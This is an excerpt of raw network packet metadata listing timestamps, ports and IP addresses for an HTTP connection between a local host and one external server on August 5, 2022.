Aug 5, 2022 13:54:18.803201914 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.803205013 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.832809925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.832853079 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.832876921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.832901955 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.832925081 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.832948923 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.832973003 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.832998037 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.833039045 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.833064079 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.833086967 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.833110094 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.833133936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.833067894 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.833161116 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.833170891 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.833177090 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.833180904 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.833182096 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.833188057 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.833192110 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.833197117 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.833198071 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.833200932 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.833205938 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.833209991 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.833214998 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.833215952 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.833219051 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.833235025 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.833252907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.833275080 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.833314896 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.833400965 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.862335920 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.862399101 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.862418890 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.862462997 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.862466097 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.862504005 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.862509966 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.862524033 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.862524033 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.862569094 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.862611055 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.862631083 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.862651110 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.862658978 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.862742901 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.862747908 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.862879992 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.862921000 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.862938881 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.862962961 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.862976074 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863003016 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863013983 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863048077 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863055944 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863090992 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863112926 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863132954 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863137007 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863174915 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863178968 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863214970 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863217115 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863255978 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863256931 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863297939 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863300085 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863337994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863339901 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863388062 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863403082 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863445044 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863447905 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863485098 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863486052 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863527060 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863528013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863568068 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863672972 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863713026 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863717079 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863753080 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863791943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863831997 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863832951 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863872051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863872051 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863912106 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.863914013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.863954067 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.864048958 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.864089966 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.864098072 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.864132881 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.864132881 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.864172935 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.864196062 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.864213943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.864244938 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.864270926 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.864285946 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.864304066 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.864330053 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.864340067 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.864370108 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.864372015 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.864412069 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.864412069 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.864454985 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.896686077 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.896740913 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.896783113 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.896785975 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.896816015 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.896825075 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.896828890 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.896867990 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.896872997 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.896908998 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.896912098 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.896953106 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.896954060 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.896995068 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897001028 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897041082 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897049904 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897083998 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897085905 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897126913 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897130966 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897171974 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897180080 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897212982 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897219896 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897257090 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897259951 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897300959 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897306919 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897341967 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897350073 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897387028 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897387028 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897429943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897466898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897473097 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897476912 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897516012 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897547960 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897559881 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897598982 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897603989 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897609949 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897648096 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897672892 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897689104 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897707939 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897732973 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897763014 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897773027 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897783041 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897823095 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897831917 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897866011 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897881985 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897907019 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897914886 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897947073 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.897977114 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.897988081 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898017883 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898032904 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898049116 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898076057 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898108959 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898133039 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898133993 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898204088 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898243904 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898247004 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898279905 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898286104 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898291111 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898327112 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898366928 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898371935 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898406982 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898408890 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898441076 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898458958 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898485899 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898492098 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898520947 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898528099 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898533106 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898571014 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898611069 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898647070 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898653030 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898654938 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898695946 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898705006 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898732901 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898737907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898778915 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898780107 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898802996 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.898819923 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898860931 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898901939 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898941994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.898967028 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899004936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899018049 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899027109 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899033070 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899038076 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899049997 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899068117 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899090052 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899110079 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899132013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899149895 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899173975 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899194002 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899214029 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899238110 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899255037 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899276972 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899296045 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899326086 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899385929 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899388075 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899439096 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899457932 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899483919 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899499893 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899523973 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899548054 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899564981 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899576902 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899606943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899617910 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899652958 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899662971 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899676085 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899717093 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899756908 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899749994 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899781942 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899797916 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899815083 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899823904 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899844885 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899852037 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899868011 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899908066 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899936914 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899971962 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.899974108 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.899981976 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.900022030 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.900028944 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.900038958 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.900082111 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.900088072 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.900121927 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.900127888 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.900732994 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.900754929 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.929347038 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929373980 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929392099 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929409981 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929429054 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929446936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929466009 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929478884 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929491997 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929491043 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.929512978 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929527998 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.929533958 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929554939 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929563046 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.929575920 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929584026 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.929598093 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929620981 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.929627895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929647923 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929656982 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.929667950 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929685116 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929697037 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.929704905 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929724932 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929733992 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.929744959 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929753065 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.929765940 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929785013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929792881 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.929805994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929826021 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929841042 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.929851055 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.929862022 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.929909945 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930011988 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930031061 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930049896 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930069923 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930073023 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930084944 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930104017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930104971 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930123091 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930130005 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930143118 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930164099 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930176973 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930181026 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930196047 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930208921 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930217028 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930226088 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930238008 CEST	80	49778	51.195.166.178	192.168.2.4
